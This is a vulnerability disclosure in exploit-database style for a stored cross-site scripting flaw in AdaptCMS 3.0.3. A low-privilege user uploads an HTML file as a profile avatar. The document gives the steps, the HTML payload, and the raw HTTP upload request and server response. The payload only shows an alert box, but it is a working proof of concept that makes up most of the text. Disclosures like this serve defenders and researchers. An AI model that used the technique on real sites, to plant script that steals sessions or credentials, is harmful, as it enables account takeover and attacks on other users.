# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"
> "Avatar"
2. Click on "Choose File" and upload the following file


html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>


// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0)
Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]";
filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail
col-lg-2" alt="" /> <input type="hidden"
name="data[User][settings][old_avatar]" value="1_html-xss.html"
id="UserSettingsOldAvatar"/>    <div class="clearfix"></div>
[...]